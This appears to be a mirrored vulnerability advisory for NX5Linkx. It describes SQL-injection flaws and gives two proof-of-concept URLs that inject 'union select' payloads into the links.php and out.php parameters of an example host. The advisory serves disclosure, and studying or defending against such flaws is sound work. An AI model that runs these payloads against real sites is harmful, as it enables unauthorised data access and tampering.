8 lines
No EOL
611 B
Text
8 lines
No EOL
611 B
Text
source: https://www.securityfocus.com/bid/20010/info
|
|
|
|
NX5Linkx is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
|
|
|
An attacker may be able to exploit these issues to modify the logic of SQL queries. Successful exploits may allow the attacker to compromise the software, retrieve information, or modify data; other consequences are possible as well.
|
|
|
|
http://www.example.com/links.php? c=999'% 20union%20select% 201,222
|
|
http://www.example.com/out.php? l=999' union select 1,1,'http://www.example.com', 1,1,1,1 |